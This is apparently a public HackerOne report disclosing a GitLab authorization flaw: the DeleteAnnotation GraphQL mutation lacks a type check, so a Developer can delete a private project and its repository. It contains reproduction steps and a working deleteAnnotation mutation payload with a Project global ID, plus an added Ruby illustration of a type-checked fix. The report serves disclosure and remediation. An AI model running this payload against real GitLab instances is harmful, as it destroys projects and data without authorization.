Insufficient Type Check leading to Developer ability to delete Project, Repository, Group, ...
HackerOne report #960244 by ledz1996
on 2020-08-17, assigned to @dcouture:
Report
Summary
Similar bug to #858671, but this time with annotations mutation: DeleteAnnotation
in app/graphql/mutations/metrics/dashboard/annotations/base.rb
module Mutations
  module Metrics
    module Dashboard
      module Annotations
        class Base < BaseMutation
          private

          # This method is defined here in order to be used by `authorized_find!` in the subclasses.
          def find_object(id:)
            GitlabSchema.object_from_id(id)
          end
        end
      end
    end
  end
end
There is no type check for find_object
in app/graphql/mutations/metrics/dashboard/annotations/delete.rb
annotation = authorized_find!(id: id)
result = ::Metrics::Dashboard::Annotations::DeleteService.new(context[:current_user], annotation).execute
And luckily, Developer is sufficient for the permission check
app/services/metrics/dashboard/annotations/delete_service.rb
Ability.allowed?(user, :delete_metrics_dashboard_annotation, annotation)
Steps to reproduce
- For User A, Create project A Private adding User B as Developer
- For User B, execute the following mutation in
http://gitlab.example.vm/-/graphql-explorer
mutation {
  deleteAnnotation(input: {id: "gid://Gitlab/Project/<project-id>"}) {
    clientMutationId
  }
}
- Project disappears along with Repository
Removing video now that the issue is public at the request of the reporter
Results of GitLab environment info

System information
System:
  Proxy:           no
  Current User:    git
  Using RVM:       no
  Ruby Version:    2.6.6p146
  Gem Version:     2.7.10
  Bundler Version: 1.17.3
  Rake Version:    12.3.3
  Redis Version:   5.0.9
  Git Version:     2.27.0
  Sidekiq Version: 5.2.9
  Go Version:      unknown

GitLab information
  Version:         13.2.3-ee
  Revision:        640e2695514
  Directory:       /opt/gitlab/embedded/service/gitlab-rails
  DB Adapter:      PostgreSQL
  DB Version:      11.7
  URL:             http://gitlab.example.vm
  HTTP Clone URL:  http://gitlab.example.vm/some-group/some-project.git
  SSH Clone URL:   git@gitlab.example.vm:some-group/some-project.git
  Elasticsearch:   no
  Geo:             no
  Using LDAP:      no
  Using Omniauth:  yes
  Omniauth Providers:

GitLab Shell
  Version:         13.3.0
  Repository storage paths:
  - default:       /var/opt/gitlab/git-data/repositories
  GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
  Git:             /opt/gitlab/embedded/bin/git
Impact
Unauthorized deletion of repository/project by maintainers and developers
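As an added illustration (not GitLab's code), the following stand-alone Ruby models the two shapes of `find_object` the report contrasts: the untyped lookup that returns whatever model the global ID names, and a variant that takes an expected type and rejects a GID for any other model before authorization or deletion logic runs. The GID format and model names follow GitLab's; the record store, the Struct classes and the sample ids are constructed stand-ins.

```ruby
# Added example, not GitLab's own code: a minimal model of a GraphQL
# global-ID lookup with and without an expected-type check.
# GIDs look like "gid://gitlab/ModelName/123"; the app segment is matched
# case-insensitively because the report writes it as "Gitlab".
GID_PATTERN = %r{\Agid://(?i:gitlab)/(?<type>[A-Za-z:]+)/(?<id>\d+)\z}

# Constructed stand-in records keyed by (model name, id). In GitLab these
# would be ActiveRecord rows; here they are plain Structs.
Project    = Struct.new(:id, :name)
Annotation = Struct.new(:id, :project_id, :description)

RECORDS = {
  'Project'                        => { 42 => Project.new(42, 'private-project') },
  'Metrics::Dashboard::Annotation' => { 7 => Annotation.new(7, 42, 'deploy marker') }
}.freeze

class WrongGidType < StandardError; end

def parse_gid(gid)
  m = GID_PATTERN.match(gid)
  raise ArgumentError, "malformed GID: #{gid}" unless m
  m
end

# Untyped shape (what the report describes): whatever model the GID names
# is returned, so a mutation meant for annotations can be handed a Project.
def object_from_id(gid)
  m = parse_gid(gid)
  RECORDS.fetch(m[:type], {})[m[:id].to_i]
end

# Type-checked shape: the caller states which model it expects, and a GID
# naming any other model is rejected before the object reaches any
# ability check or destroy call.
def object_from_id_checked(gid, expected_type:)
  m = parse_gid(gid)
  unless m[:type] == expected_type
    raise WrongGidType, "#{gid} names a #{m[:type]}, expected #{expected_type}"
  end
  RECORDS.fetch(expected_type, {})[m[:id].to_i]
end

# The find_object an annotation mutation would use under the checked shape.
# Returns nil for an unknown id of the right type, raises for the wrong type.
def find_annotation(gid)
  object_from_id_checked(gid, expected_type: 'Metrics::Dashboard::Annotation')
end
```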
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section:
- See the steps to reproduce above by the reporter; they are very clear.